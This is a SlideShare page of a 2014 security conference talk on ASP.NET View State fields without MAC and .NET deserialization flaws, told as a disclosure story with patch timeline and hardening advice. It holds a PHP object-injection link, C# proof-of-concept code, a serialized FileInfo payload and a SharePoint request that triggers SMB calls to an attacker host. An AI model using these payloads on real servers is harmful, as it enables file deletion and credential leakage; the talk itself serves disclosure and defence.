SlideShare une entreprise Scribd logo

Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0

Cyber Security Alliance
Cyber Security Alliance

The document summarizes a presentation about discovering a design issue in .NET's handling of view state fields without integrity protection. During a web application assessment in 2012, the presenter found that custom serialization of view state into an unprotected field could allow tampering by modifying the serialized object graph. This led to the realization that known .NET deserialization behaviors could be triggered remotely by manipulating the view state. A proof-of-concept exploited this by generating view state containing a FileInfo object that deleted a file on the server when deserialized. This uncovered a remote code execution vulnerability in some ASP.NET applications.

Technologie
1  sur  51
Télécharger pour lire hors ligne
Application Security Forum - 2014 Western Switzerland 05-06 November 2014 - Y-Parc / Yverdon-les-Bains http://www.appsec-forum.ch Why .NET needs MACs and other serial(-ization) tales Alexandre Herzog CTO / Compass Security Schweiz AG
Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 2
About the tale It’s the story of a simple web app test which ended up uncovering a design issue within the .NET framework. I won’t cover the disclosure process in detail •Not that I don’t want to, but I don’t have time for it •Feel free to come over and discuss this afterwards –Idéalement autour d’un verre de vin ;-) 3
About its storyteller Vaudois exilé d’abord en Valais, then Wellington (New Zealand) und jetzt Zürich Breaking stuff since 2010 for Compass Security •Previously worked for banks as sysadmin / developer Finished my MAS in Information Security in 2013 •MAS thesis about “Crypto-based security mechanisms in Windows and .NET” Author of several security advisories •And still no Twitter handle (!) 4
Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 5
Once upon a time… September 2012, •during a standard ASP.NET web application assessment… <body> <form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> <div> <input type="hidden" […] value="" /> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> <input type="hidden" name="__VSTATE" id="__VSTATE" value="[LONG_BASE64_STRING]" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> </div> 6
Once upon a time… September 2012, •during a standard ASP.NET web application assessment… <body> <form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> <div> <input type="hidden" […] value="" /> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> <input type="hidden" name="__VSTATE" id="__VSTATE" value="[LONG_BASE64_STRING]" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> </div> 7
Once upon a time… protected override object LoadPageStateFromPersistenceMedium() { string viewState = Request.Form["__VSTATE"]; byte[] bytes = Convert.FromBase64String(viewState); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Decompress(bytes); LosFormatter formatter = new LosFormatter(); return formatter.Deserialize(Convert.ToBase64String(bytes)); } protected override void SavePageStateToPersistenceMedium(object viewState){ LosFormatter formatter = new LosFormatter(); StringWriter writer = new StringWriter(); formatter.Serialize(writer, viewState); string viewStateString = writer.ToString(); byte[] bytes = Convert.FromBase64String(viewStateString); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Compress(bytes); x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes)); } 8
Once upon a time… protected override object LoadPageStateFromPersistenceMedium() { string viewState = Request.Form["__VSTATE"]; byte[] bytes = Convert.FromBase64String(viewState); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Decompress(bytes); LosFormatter formatter = new LosFormatter(); return formatter.Deserialize(Convert.ToBase64String(bytes)); } protected override void SavePageStateToPersistenceMedium(object viewState){ LosFormatter formatter = new LosFormatter(); StringWriter writer = new StringWriter(); formatter.Serialize(writer, viewState); string viewStateString = writer.ToString(); byte[] bytes = Convert.FromBase64String(viewStateString); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Compress(bytes); x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes)); } 9
Once upon a time… We have •A custom implementation of the __VIEWSTATE field •Its value is stored compressed within __VSTATE •It uses the default LosFormatter object constructor •No Machine Authentication (sic) Code (MAC) is used •The __VIEWSTATE field sent to the client is therefore not integrity-protected –Despite the fact we serialize / deserialize objects… The same applies to regular ASP.NET pages •If property EnableViewStateMac is disabled (enabled by default) 10
Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 11
Tales “Why does .NET need MACs” A View State Contains •2 bytes of header data (ASP.NET 1.1 versus 2.0+) •A tree of serialized objects (View State Bag & Serialized ASP.NET controls of the page) •A (H)MAC ensuring integrity (if configured so – default: enabled) A View State •Can be encrypted •Can be split into blocks of x bytes (__VIEWSTATEFIELDCOUNT & __VIEWSTATEx fields) •Can include user defined values to ensure a unique MAC is generated (Page.ViewStateUserKey property) 12
Tales “Why does .NET need MACs” View State handling and lifecycle 13 ASP.NET deserializes the View State and copies the values back into the controls Serialize Deserialize Request from the client comes in Response is sent to the client
Tales “Why does .NET need MACs” State of the art of hacking View States back then: Trustwave's SpiderLabs Security Advisory TWSL2010-001: Multiplatform View State Tampering Vulnerabilities Published: 2010-02-08 Version: 1.1 SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported. Credit: David Byrne of Trustwave's SpiderLabs The ASP.Net view state is typically stored in a hidden field named "__VIEWSTATE". When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state. 14
15
Tales “Why does .NET need MACs” Inappropriate Microsoft advice back then (Trustwave): 16
Tales “Why does .NET need MACs” State of the art of exploiting ASP.NET View State fields without MACs: •Abuse them for XSS •You must have an existing control on the page accepting HTML to inject your payload Back in 2010, Trustwave already identified RCE in Mojarra (Java) View State via Expression Language •Implemented in their “Deface” tool •This attack was presented in MISC magazine #69 17
Tales “Why does .NET need MACs” Back to September 2012: so ASP.NET unprotected View State fields can be misused •But “only” for XSS when a few pre-conditions are met •And computing a MAC is bad for performance according to Microsoft articles (or was at least in 2010) Some pages in e.g. SharePoint do not enforce a MAC on the View State •View State on these pages is empty, so you can’t misused them for XSS 18
Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 19
“Serialization” tales Serialization is known to be an issue in web apps •Potentially user defined content gets deserialized on the server •Depends on the technology and the application’s code •Tool “Deface” targets Apache MyFaces 1.2.8 applications Let’s see a PHP example: 20
“Serialization” tales class Example1 { public $cache_file; function __construct() { // some PHP code... } function __destruct() { $file = "/var/www/cache/tmp/{$this->cache_file}"; if (file_exists($file)) @unlink($file); } } // some PHP code... $user_data = unserialize($_GET['data']); // some PHP code... 21
“Serialization” tales Flaw can be exploited with the following link •http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10: "cache_file";s:15:"../../index.php";} When receiving this request, the server •Takes GET parameter “data” and “unserialize” it •Casts it to object type “Example1” •Assigns value “../../index.php” to property “cache_file” •When the page lifetime is over, method “__destruct()” of object “Example1” is called which deletes the file Can the same be done with .NET? 22
23
“Serialization” tales Great research of James Forshaw (Context) Studying (and exploiting) .NET serialization via •IFormatter •XML Serialization •WCF Data Contracts •JSON But not a word about serialization of •View State field •LosFormatter object (limited object serialization) 24
“Serialization” tales Awesomeness of James Forshaw’s research •Standard .NET object TempFileCollection deletes files in destructor [Serializable] public class TempFileCollection { private Hashtable files; // Deserialized list of files // Other stuff... ~TempFileCollection() { foreach (string file in files.Keys) { File.Delete(file); // Makes sure to delete them when // The object is destroyed! } } } 25
“Serialization” tales Awesomeness of James Forshaw’s research •Standard .NET object FileInfo triggers SMB requests [Serializable] public class FileInfo { private string FullPath; protected FileInfo(SerializationInfo info, StreamingContext context) { // Ensures path is canonical FullPath = NormalizePath(info.GetString("FullPath")); } } string NormalizePath(string path) { string[] parts = path.Split(''); foreach(string part in parts) { currPath += "" + part; if(part[0] == '~') { // If potential short path, GetLongPathName(currPath); } // call Windows API } } 26
Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 27
When the stories come together – My tale What if I can combine the fact I now have •A View State field without integrity protection (resp. MAC) •Known .NET objects having interesting (de)serialization actions If possible, I would be able to e.g. •Delete a file on the server •Get the server to initiate a SMB request to e.g. the attacker’s machine Can I apply it? Can it be done within the few hours left onsite? 28
When the stories come together – My tale using System; using System.IO; using System.Text; using System.Web.UI; // created in a hurry by Alexandre Herzog, csnc.ch, 20.09.2012 public class ExploitViewstate { // Caution: both files must be the same length! static String bugusFile = @"ATTACKER~testtext.txt"; static String dummyFile = @"c:testCompasstestVS.txt"; public static void Main(string[] args) { String validViewstate = GenerateValidViewstate(); Console.WriteLine("Valid viewstate: {0}", validViewstate); } private static String GenerateValidViewstate() { FileInfo fi = new FileInfo(dummyFile); LosFormatter los = new LosFormatter(); using (StringWriter sw = new StringWriter()) { los.Serialize(sw, fi); return sw.ToString(); } } } 29
When the stories come together – My tale C:>set csc=c:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe C:>%csc% exploitViewstate.cs && exploitViewstate.exe Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.4927 for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727 Copyright (C) Microsoft Corporation 2001-2005. All rights reserved. Valid View State: /wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwI AAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs= For the PoC, we need to change the file in the above Base64 string from •c:testCompasstestVS.txt to •ATTACKER~testtext.txt 30
When the stories come together – My tale On an unpatched SharePoint, just send the following request: •http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&_ _VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 31
When the stories come together – My tale On an unpatched SharePoint, just send the following request: •http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&_ _VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 32
When the stories come together – My tale In the SharePoint logs: 09/25/2012 17:49:25.68 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Monitoring nasq Medium Entering monitored scope (Request (GET:http://sps:80/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAA AAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d)) […] 09/25/2012 17:49:44.24 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Runtime tkau Unexpected System.InvalidCastException: Unable to cast object of type 'System.IO.FileInfo' to type 'System.Web.UI.Pair'. at System.Web.UI.HiddenFieldPageStatePersister.Load() c263fbf5- 6190-481e-8b21-c2cb5d04222b 33
When the stories come together – My tale Demo! When the View State MAC is disabled, you can •Delete a file on the server (via object TempFileCollection) •Get the server to initiate a SMB request to e.g. the attacker’s machine (via object FileInfo) •I wasn’t able to get a generic remote code execution (so far) –Highly dependent on the application / content of the server’s GAC –But I heard this week that it’s possible to get RCE and that some smarter people than I have a working exploit… 34
Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 35
Time sequence of the (patch) battle Disclosure milestones •26.09.2012 Initial contact with MSRC •19.02.2013 Microsoft aims for a fix in SharePoint in May •28.02.2013 Microsoft confirms work is under way for SkyDrive •15.04.2013 Patch postponed (issues found during tests); MS will issue guidance about the View State MAC •03.07.2013 Patch again postponed (issues found during tests) •16.08.2013 Detailed answer about the next steps; BlueHat invitation •10.09.2013 September’s patch Tuesday with MS13-067 (Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution) 36
Time sequence of the (patch) battle Disclosure milestones (continued) •06.11.2013 Conference call with Microsoft •10.12.2013 December’s patch Tuesday with –MS13-100 (Vulnerabilities in Microsoft SharePoint Server Could Allow RCE) –MS13-105 (Vulnerabilities in Microsoft Exchange Server Could Allow RCE) –KB2905247 (Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege) •11.12.2013 Meeting with several Microsoft people in Seattle 37
Time sequence of the (patch) battle Disclosure milestones (continued) •05.05.2014 Release of ASP.NET 4.5.2 which forbids disabling the View State MAC •13.05.2014 May’s patch Tuesday with MS14-024 (SharePoint) •07.08.2014 Announcement that only the latest (ASP).NET framework will be supported in 2016 onward •09.09.2014 Release to all customers via Windows Update of the December 2013 patch KB2905247 You are now safe… … if you install all suggested WU patches 38
Time sequence of the (patch) battle But what was the content of •MS13-100 / CVE-2013-5059 •MS14-022 / CVE-2014-0251 (?) & CVE-2014-1813 (?) Microsoft did their homework •A cross-product/company wide effort was made to address serialisation / View State issues •Several additional attack vectors were found and fixed 39
Time sequence of the (patch) battle Extract of MS13-100 (CVE-2013-5059) •New namespace “Microsoft.Office.Server.Security” •New internal class SafeSerialization with methods »IsSafeBinaryFormatterStreamWithAllowList([…]) […] »IsSafeBinaryFormatterStreamCommon( […]) •Usage within SharePoint: 40
Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 41
Is the ugly bug really dead? Yes if you patch adequately •No pages in SharePoint should be vulnerable •No pages in Outlook Web Access should be vulnerable •Disabling the Viewstate MAC should not be possible anymore with patch KB 2905247 installed This patch securing the Viewstate is controversial •“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” But how is the MAC computed? •Using the keys defined in <machineKey /> 42
Is the ugly bug really dead? Yes if you patch adequately •No pages in SharePoint should be vulnerable •No pages in Outlook Web Access should be vulnerable •Disabling the Viewstate MAC should not be possible anymore with patch KB 2905247 installed This patch securing the Viewstate is controversial •“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” But how is the MAC computed? •Using the keys defined in <machineKey /> 43
Is the ugly bug really dead? Result of an audit searching for static machineKey entries 44
Is the ugly bug really dead? If I have your machineKey… •… I can generate a valid View State MAC too •Well, I can also generate a Forms Authentication cookie among other things… Issue was formally reported to Microsoft in August 2013 •Microsoft took contact with the affected projects How do you manage your machineKeys? 45
Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 46
The (happy?) end Ensure your products are patched / unaffected •SharePoint (MS13-067 & MS13-100) •Exchange (OWA – MS13-0105) •ASP.NET (KB2905247) •All your other third party ASP.NET sites If you don’t use ASP.NET 4.5.2 yet •Plan to support this version as Microsoft will drop support for elderly version in 2016 47
The (happy?) end Verify your ASP.NET applications •Don’t deserialize untrusted documents (e.g. on file uploads) •Don’t re-implement custom Viewstate-like features Ensure you manage your machineKeys correctly •If static keys are defined, manage them as carefully as all the other crypto-stuff •No copy/paste from Internet, dedicated keys per environment, … •Encrypt the sensitive sections of your web.config 48
Questions? 49
Merci/Thank you! Contact: alexandre.herzog@csnc.ch Blog http://blog.csnc.ch/ LinkedIn http://ch.linkedin.com/in/alexandreherzog/ G+ https://plus.google.com/u/1/109572456864701444940/ Slides: http://slideshare.net/ASF-WS/presentations http://appsec-forum.ch 50
References Understanding ASP.NET View State http://msdn.microsoft.com/en-us/library/ms972976.aspx Beware of Serialized GUI Objects Bearing Data https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC- 2010-Byrne-SGUI-slides.pdf OWASP - PHP Object Injection https://www.owasp.org/index.php/PHP_Object_Injection Are you my Type? https://media.blackhat.com/bh-us- 12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf Barry Dorrans - Going beyond OWASP (esp. 36:40 to 46:45) http://vimeo.com/108438465 Moving to the .NET Framework 4.5.2 http://blogs.msdn.com/b/dotnet/archive/2014/08/07/moving-to-the-net- framework-4-5-2.aspx Farewell, EnableViewStateMac! http://blogs.msdn.com/b/webdev/archive/2014/09/09/farewell- enableviewstatemac.aspx 51

Recommandé

BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Codemotion
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesWebsecurify
 

Recommandé

BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Codemotion
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesWebsecurify
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyKaspersky
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Spring boot Under Da Hood
Spring boot Under Da HoodSpring boot Under Da Hood
Spring boot Under Da HoodMichel Schudel
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory ForensicsIIJ
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Nabin Dutta
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Svetlin Nakov
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Security in NodeJS applications
Security in NodeJS applicationsSecurity in NodeJS applications
Security in NodeJS applicationsDaniel Garcia (a.k.a cr0hn)
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...SPTechCon
 
Developing your first application using FIWARE
Developing your first application using FIWAREDeveloping your first application using FIWARE
Developing your first application using FIWAREFIWARE
 

Contenu connexe

Tendances

XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyKaspersky
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Spring boot Under Da Hood
Spring boot Under Da HoodSpring boot Under Da Hood
Spring boot Under Da HoodMichel Schudel
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory ForensicsIIJ
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Nabin Dutta
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Svetlin Nakov
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 

Tendances (20)

XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
Secure code
Secure codeSecure code
Secure code
 
Spring boot Under Da Hood
Spring boot Under Da HoodSpring boot Under Da Hood
Spring boot Under Da Hood
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
